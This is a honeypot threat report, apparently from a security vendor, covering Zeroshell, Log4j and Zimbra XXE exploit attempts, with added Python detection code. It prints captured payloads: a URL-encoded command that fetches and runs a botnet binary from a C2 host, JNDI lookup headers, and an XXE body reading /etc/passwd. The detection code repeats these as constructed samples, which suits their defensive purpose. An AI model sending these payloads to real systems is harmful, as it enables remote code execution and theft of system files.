These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.
Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots
TEHTRIS NTA detected two malicious IP addresses performing inbound Zeroshell remote code execution (RCE) attempts. Some of our European honeypots could have been compromised through CVE-2019-12725 (CVSSv3: 9.8).
The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is listed in public databases of malicious IP addresses.
The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is not listed in public databases of malicious IPs. It performed only one hit, on a German honeypot.
The URL in the request below carries the command that downloads and runs the Zero botnet payload:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
URL decoded: “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”
The IP address embedded in the packet above (5.206.227[.]228), likely a C2, is a Portuguese address already known for Zeroshell exploitation. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
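As an added example that is not part of the original report nor of TEHTRIS NTA, the following Python decodes a kerbynet request line and reports the shell metacharacters, download verbs and payload URL a detection rule for this attempt would look for. The sample request is constructed after the hit above, with the download host replaced by a documentation address.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample request line, modelled on the kerbynet hit described above.
# The download host is a documentation address here, not the IP the honeypot saw.
SAMPLE_REQUEST = (
    "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;"
    "curl%20-O%20http%3A%2F%2F203.0.113.10%2Fzero;sh%20zero;%22 HTTP/1.0"
)

# Shell metacharacters and download/exec verbs that have no business in the
# 'type' parameter of kerbynet's x509List action.
INJECTION_MARKERS = re.compile(r"[;|`&]|\b(?:curl|wget|sh|bash)\b")
URL_IN_PAYLOAD = re.compile(r"https?://[^\s;\"']+")


def parse_query(query):
    """Split a raw query string on '&' only: the literal ';' is part of the
    payload here, and older parse_qs() versions treat it as a separator."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def analyse_kerbynet_request(request_line):
    """Return details of a CVE-2019-12725 style injection attempt, or None when
    the request does not target kerbynet or carries no injection markers."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/kerbynet":
        return None
    params = parse_query(parts.query)
    decoded_type = params.get("type", "")
    markers = sorted({m.group(0) for m in INJECTION_MARKERS.finditer(decoded_type)})
    if not markers:
        return None
    urls = URL_IN_PAYLOAD.findall(decoded_type)
    return {
        "unauthenticated": params.get("Section") == "NoAuthREQ",
        "action": params.get("Action"),
        "decoded_type": decoded_type,
        "markers": markers,
        "download_urls": urls,
        "download_hosts": sorted({urlsplit(u).hostname for u in urls}),
    }
```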
Log4j exploit attempts on a Swedish honeypot
One of our Swedish honeypots has been the target of a large number of requests carrying “jndi” lookup strings, which are known to be used in attempts to exploit the Log4j vulnerability on devices.
27 IP addresses sent the following set of headers, which was the most frequently observed:
['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']
The other header sets observed look exactly the same, except that the port number 8182 varies within the range 8180 to 8189.
Here are the top 10 IoCs, all listed in public databases of malicious IPs:
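An added example, not from the original post: Python detection logic that scans a header set for JNDI lookup strings and summarises the abused header names and callback ports. The header sample is constructed after the one above; the pattern also tolerates the “$ {jndi:” spacing seen in the capture and schemes other than ldap, so it generalises slightly beyond what was observed here.

```python
import re

# Constructed header sample, modelled on the request shown above: the same
# ${jndi:...} lookup is stuffed into many header names, with the port varying
# across 8180-8189. The capture rendered the lookup as "$ {jndi:...}", so the
# pattern tolerates whitespace around the braces.
SAMPLE_HEADERS = [
    "origin: $ {jndi:ldap://:8182/a}",
    "x-api-version: $ {jndi:ldap://:8182/a}",
    "accept: */*",
    "accept-encoding: gzip",
    "x-forwarded-proto: ${jndi:ldap://:8180/a}",
    "user-agent: ${jndi:ldap://198.51.100.7:8189/a}",
]

JNDI_LOOKUP = re.compile(
    r"\$\s*\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://"
    r"(?P<host>[^:/}\s]*)(?::(?P<port>\d+))?(?P<path>/[^}]*)?\}",
    re.IGNORECASE,
)


def scan_headers(raw_headers):
    """Return one finding per header whose value carries a JNDI lookup string."""
    findings = []
    for line in raw_headers:
        name, _, value = line.partition(":")
        match = JNDI_LOOKUP.search(value)
        if match:
            findings.append({
                "header": name.strip().lower(),
                "scheme": match["scheme"].lower(),
                "host": match["host"],
                "port": int(match["port"]) if match["port"] else None,
            })
    return findings


def summarise(findings):
    """Collapse findings into what an analyst wants to see: which headers were
    abused, which callback hosts and ports were tried."""
    return {
        "hit_count": len(findings),
        "headers": sorted({f["header"] for f in findings}),
        "ports": sorted({f["port"] for f in findings if f["port"] is not None}),
        "hosts": sorted({f["host"] for f in findings if f["host"]}),
    }
```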
IP | AS | Country
93.91.117[.]60 | AS 47562 Fast Link Ltd | RU
120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN
85.51.217[.]156 | AS 12479 Orange Espagne SA | ES
118.41.204[.]72 | AS 4766 Korea Telecom | KR
222.103.98[.]58 | AS 4766 Korea Telecom | KR
72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US
178.140.136[.]178 | AS 42610 Rostelecom | RU
223.171.91[.]144 | AS 17853 LGTELECOM | KR
46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL
147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US
Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP
Thanks to TEHTRIS NTA, which automatically detects anomalies in the traffic, we monitored over these past two weeks an increase in attempts to exploit CVE-2019-9621 (CVSSv3: 7.5), impacting Zimbra versions earlier than 8.8.11. Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows Server-Side Request Forgery (SSRF) and XML External Entity (XXE) injection via the ProxyServlet component.
The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP, identified as malicious in public databases, started to attack our honeypots on the 10th of January.
Here is one example of the requests seen in an NTA packet capture:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xx.x.xxx.xx:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
The entity declaration (SYSTEM "file:///etc/passwd"), expanded through &xxe; in the body, is an attempt to read the file /etc/passwd, which notably contains the list of the machine's user accounts.
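Added example, not TEHTRIS code: inspecting an XML request body for DTD entity declarations with Python's expat callbacks, recording external entities without ever resolving them and refusing any external reference the parser meets. Both request bodies are constructed after the Autodiscover example above.

```python
import xml.parsers.expat

# Constructed request body modelled on the Autodiscover POST shown above.
SAMPLE_BODY = (
    '<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/'
    'outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress>'
    '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>'
)

# Constructed body with no DTD at all, the shape a legitimate client would send.
BENIGN_BODY = (
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/'
    'outlook/responseschema/2006a"><Request><EMailAddress>user@example.org'
    '</EMailAddress></Request></Autodiscover>'
)


def inspect_xml_body(body):
    """Walk the DTD with expat callbacks and record entity declarations without
    resolving them; a reference to an external entity aborts the parse."""
    report = {"has_doctype": False, "external_entities": [],
              "internal_entities": [], "parse_error": None}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["has_doctype"] = True

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:          # SYSTEM/PUBLIC entity: points outside the document
            report["external_entities"].append((name, system_id))
        else:
            report["internal_entities"].append((name, value))

    def refuse_external(context, base, system_id, public_id):
        return 0  # tell expat not to fetch anything; the parse fails instead

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = refuse_external
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError as exc:
        report["parse_error"] = str(exc)
    return report


def is_xxe_attempt(report):
    """Any declared external entity in a request body is a red flag."""
    return bool(report["external_entities"])
```

In production the same outcome is reached by disabling DTD processing in the XML parser that handles Autodiscover requests; this block only shows what a network-level inspector can extract from the body.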
Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot
Hardworking Bulgarian threat actors?
Masscan, an open-source scanner widely used
Information remains TEHTRIS’ sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assumes no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied, regarding the accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.